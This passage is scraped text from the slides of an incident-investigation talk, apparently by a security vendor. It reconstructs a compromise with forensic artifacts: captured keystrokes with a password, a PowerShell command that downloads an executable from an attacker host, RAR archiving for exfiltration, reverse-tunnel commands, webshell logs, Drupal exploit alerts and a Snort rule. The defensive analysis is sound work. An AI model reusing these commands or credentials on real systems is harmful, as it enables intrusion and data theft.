hJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==");
string l = AES.ReadLogFile(“.\\Logs\\03-29-2019");
04-16-201904-16-2019
<p class="h">
<br>
<br>[<b>Connect to dc0.muchmoney.ga - 11:36</b>]</p>
<br>muchmoney.ga\tsokihata
<p class="h">[Tab]</p>Kur0$@w@
<p class="h">[Enter]</p>
<br>
<p class="h">
![Page 54: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/54.jpg)
alert tcp $EXTERNAL_NET :1024 -> $HOME_NET
any (msg:"Non-Std TCP Server Traffic contains '|40
00 00 00|' (Quasar RAT Initial Packet)"; sid:10000;
rev:1; flow:established,from_server; dsize:68;
content:"|40 00 00 00|"; depth:4; fast_pattern;)
Forensics
Network
![Page 55: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/55.jpg)
![Page 56: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/56.jpg)
![Page 57: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/57.jpg)
![Page 58: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/58.jpg)
![Page 59: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/59.jpg)
![Page 60: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/60.jpg)
PwIntercept
media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
docs.microsoft.com/en-us/windows/win32/secmgmt/installing-and-registering-a-password-filter-dll
citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1032.2458&rep=rep1&type=pdf
Password Filter DLL:
Windows credential theft: Methods and mitigations:
THE PROJECTSAURON APT:
![Page 61: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/61.jpg)
{
"Source": "Security",
"EventID": 601,
"EventType": 8,
"Computer": "WIN2003",
"NumStrings": 8,
"SID": "S-1-5-18",
"TimeGenerated": 2019-03-28T06:17:29+00:00,
"Strings": [
"KUqy",
"powershell -command (new-object System.Net.WebClient).DownloadFile(\\'http://muchm0ney.tk/spoolsvc.exe\\',
\\'C:\\wmpub\\mwiislog\\spoolsvc.exe\\'",
"16",
"2",
"LocalSystem",
"ANONYMOUS LOGON",
"NT AUTHORITY",
"(0x0,0x41D63)"
],
"RecordNumber": "4476",
"TimeWritten": 1553753849
}
https://metacpan.org/pod/Parse::EventLog
Attempt to install service
EVT Log
Parse::EventLog:
![Page 62: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/62.jpg)
18.222.249.59 3389 29.03.2019 8:04
https://github.com/zer0-t/RDP-screenshotter/blob/master/RDP-screenshotter.shRDP-screenshotter:
![Page 63: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/63.jpg)
Анализ: update.exestrings:
golang
IDA:
Need main
![Page 64: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/64.jpg)
Анализ: update.exe
d
GoUtils: gitlab.com/zaytsevgu/GoUtils2.0/
GoUtils
main_main
![Page 65: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/65.jpg)
Анализ: update.exe
d
some bytes
XOR
![Page 66: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/66.jpg)
github.com/volatilityfoundation/volatility
Forensics
Memory
An advanced memory forensics framework::
![Page 67: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/67.jpg)
67
\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services\share" -pY23QyJCj%kak
\WINDOWS\system32\cmd.exe - r.exe "C:\Documents and
Settings\Administrator\Application Data\services\share.rar" -hp23QyJCj%kAK
\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services" -pY23QyJCj%kAK
Adminisystem32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services\share.rar" -pY23QyJCj%kak
C:\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services" -pY23QyJCj%kAKkAAK*5
![Page 68: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/68.jpg)
40 00 ? 06 ? ? 0A 00 ? ? 0A 00 B9 68 ? ? 01 bd
www.iana.org/assignments/protocol-numbers/protocol-numbers.xml
TCP Flags Don’t fragment
Skip TTL
Skip header checksum
Src address: 10.0.*.*
Any Source Port
SMB Port: 445
Dst address: 10.0.185.104
tools.ietf.org/html/rfc791#section-3.1
Proto: TCP - 6
RFC 791 - Internet Protocol:
Assigned Internet Protocol Numbers:
![Page 69: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/69.jpg)
gchq.github.io/CyberChef/#recipe=From_Hex('Auto')To_Decimal('Space',false)&input=NDAgMDAgNDAgMDYgNzAgMjcgMEEgMDAgQjkgNjkgMEEgMDAgQjkgNjgg
QTYgMDQgMDEgQkQCyberChef Recipe:
![Page 70: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/70.jpg)
![Page 71: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/71.jpg)
./auth.log.2.gz:Mar 27 23:04:37 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ;
PWD=/var/www/html/ssf/ssf-linux-x86_64-3.0.0 ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445
54.165.150.118 -p 80
./auth.log.2.gz:Apr 10 14:21:52 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html ;
USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] connecting to <54.165.150.118:80>
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] running (Ctrl + C to stop)
-rwxrwx--- 1 root vboxsf 353 мар 27 2019 ./var/www/html/ssf/ssf-linux-
x86_64-3.0.0/config.json
-rwxrwx--- 1 root vboxsf 80K мар 27 2019
./var/www/html/sites/default/modules/connect.php
-rwxrwx--- 1 root vboxsf 353 мар 27 2019 ./var/www/html/config.json
-rwxrwx--- 1 root vboxsf 80K мар 27 2019 ./var/www/html/connect.php
securesocketfunneling.github.io/ssf/#homeSecure Socket Funneling:
![Page 72: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/72.jpg)
github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.phpWebShell wso-4.2.5:
![Page 73: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/73.jpg)
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:00:23 +0300] "GET /connect.php HTTP/1.1" 200 6588
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101
Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:37 +0300] "POST /connect.php HTTP/1.1" 200 5842
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101
Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:38 +0300] "GET /connect.php HTTP/1.1" 200 6588
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:05:43 +0300] "POST /connect.php HTTP/1.1" 200 5838
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"
Count Date
77 28/Mar/2019
50 10/Apr/2019
42 26/Mar/2019
35 27/Mar/2019
Count IP
96 18.222.249.59
64 77.243.191.35
43 31.44.93.2
1 103.244.3.7
![Page 74: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/74.jpg)
![Page 75: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/75.jpg)
![Page 76: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/76.jpg)
![Page 77: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/77.jpg)
https://github.com/ptresearch/AttackDetection/blob/master/CVE-2019-6340/cve-2019-6340.rules
https://www.ambionics.io/blog/drupal8-rce
CVE-2019-6340
Exploit Drupal8's REST RCE
https://www.exploit-db.com/exploits/46459REST Module Remote Code Execution:
EXPLOITING DRUPAL8'S REST RCE:Open PT ESC ruleset:
![Page 78: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/78.jpg)
7878
https://bitly.com/2UbQmhT+
03/27/2019-21:32:06.083219 [**] [1:10003494:2] TOOLS [PTsecurity] PHP Object
Deserialization RCE POP Chain (Guzzle/RCE1) [**] [Classification: Attempted
Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 ->
192.70.197.230:80
03/27/2019-21:32:06.083219 [**] [1:10004555:3] ATTACK [PTsecurity] Arbitrary
PHP RCE in Drupal 8 < 8.5.11,8.6.10 (CVE-2019-6340) [**] [Classification:
Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -
> 192.70.197.230:80
Bitly | URL Shortener:
![Page 79: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/79.jpg)
Initial Access Execution Persistence Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Command and Control Impact
Exploit Public-Facing Application
Command-Line Interface
Registry Run Keys / Startup Folder
Web Shell Clear Command History Credential Dumping Account Discovery Pass the Hash Clipboard DataData
CompressedCommonly Used Port Data Destruction
PowerShell Web ShellDeobfuscate/Decode Files or
InformationPassword Filter DLL
File and Directory Discovery
Remote Desktop Protocol
Input Capture Connection Proxy Disk Content Wipe
Regsvr32 File Deletion Network Share Discovery Remote File Copy Screen Capture Data EncodingStored Data
Manipulation
Scripting File Permissions Modification Network Sniffing Windows Admin Shares Video Capture Data Obfuscation
Service Execution Hidden Files and Directories Password Policy Discovery Multilayer Encryption
MasqueradingPermission Groups
DiscoveryRemote Access Tools
Network Share Connection Removal
Process Discovery Remote File Copy
Obfuscated Files or Information Query RegistryStandard Application Layer
Protocol
DLL Side-LoadingSystem Information
DiscoveryStandard Cryptographic
Protocol
ScriptingSystem Network
Configuration Discovery
TimestompSystem Network
Connections Discovery
MatrixATT&CK
https://attack.mitre.org/ATT&CK Matrix for Enterprise:
![Page 80: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/80.jpg)
Анализ: timeline
![Page 81: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/81.jpg)
Анализ: результаты
• Исследование вширь и вглубь,
• Проведение как динамического, так и статического анализа,
• Хранение трафика,
• Расшифровка трафика,
• Проведение логических взаимосвязей между данными,
• Выявление прочих векторов атак,
• Нахождение исходного вектора,
• Корреляция найденных артефактов,
• Заполнение временнЫх пробелов,
• Понимание логики действий
![Page 82: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/82.jpg)
Вопросы
![Page 83: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/83.jpg)
ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/PT ESC Threat Intelligence blog
PT ESC Incident Response Alertptsecurity.com/ru-ru/services/esc/
Вопросы
ptsecurity.com/upload/corporate/ww-en/analytics/calypso-apt-2019-eng.pdf
ptsecurity.com/upload/corporate/ww-en/analytics/Operation-Taskmasters-2019-eng.pdf
Полезные ссылки
Calypso АРТ: изучаем новую группировку, атакующую госучреждения
Operation TaskMasters: Кибершпионаж в эпоху цифровой экономики
![Page 84: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/84.jpg)
ptsecurity.com
Спасибо
за внимание!